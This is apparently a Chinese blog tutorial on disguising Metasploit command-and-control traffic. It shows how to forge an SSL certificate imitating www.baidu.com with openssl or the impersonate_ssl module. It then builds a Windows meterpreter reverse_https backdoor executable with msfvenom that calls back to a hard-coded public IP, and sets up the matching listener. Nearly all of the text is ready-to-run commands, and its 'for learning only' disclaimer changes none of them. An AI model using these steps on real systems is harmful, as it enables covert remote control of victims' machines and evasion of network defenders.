MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

免责声明:本文仅做技术交流与学习...

目录

步骤:

[1-利用 openssl 生成证书](#1-利用 openssl 生成证书)

[1-impersonate_ssl 模块 --生成证书](#1-impersonate_ssl 模块 --生成证书)

​编辑

[2.MSF 生成绑定证书后门:](#2.MSF 生成绑定证书后门:)

[3.MSF 监听上线:](#3.MSF 监听上线:)

证书伪造

https流量加密


-解决 HTTPS-SSL 通讯证书被特征标示问题

步骤:

1-利用 openssl 生成证书

复制代码
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

1-impersonate_ssl 模块 --生成证书

复制代码
此外 Metasploit 框架还有一个 auxiliary/gather/impersonate_ssl 模块,可以用来自动从信任源创建一个虚假证书,十分方便: 
use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com 
run 
--->.pem


2.MSF 生成绑定证书后门:

复制代码
msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell 
HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe 

3.MSF 监听上线:

复制代码
use exploit/multi/handler 
set payload windows/meterpreter/reverse_https 
set lhost 0.0.0.0 
set lport 5566 
set HandlerSSLCert /root/www.baidu.com.pem 
set StagerVerifySSLCert true 
run 

---可以访问https看看证书

证书伪造


https流量加密


相关推荐
站长朋友18 小时前
【邀请函】锐成信息 × Sectigo | CLM - SSL 证书自动化运维解决方案发布会
运维·自动化·ssl·clm·sectigo·47天ssl证书
qq_1838028718 小时前
Linux内核idr数据结构使用
linux·运维·服务器
码农-小林18 小时前
使用leaflet库加载服务器离线地图瓦片(这边以本地nginx服务器为例)
运维·服务器·nginx
噜啦噜啦嘞好19 小时前
Linux:库制作与原理
linux·运维·服务器
androidstarjack19 小时前
知乎服务器崩溃!
运维·服务器
呉師傅20 小时前
关于联想ThinkCentre M950t-N000 M大师电脑恢复预装系统镜像遇到的一点问题
运维·网络·windows·电脑
代码AI弗森20 小时前
无状态的智慧:从 HTTP 到大模型的系统进化论
网络·网络协议·http
酷熊代理21 小时前
安卓手机 IP 切换指南:告别卡顿,轻松换 IP
网络·网络协议·tcp/ip·socks5
不做菜鸟的网工21 小时前
PIM SM +MSDP 组播跨域配置案例
网络协议
月上柳青21 小时前
快速创建无线AP热点
网络·智能路由器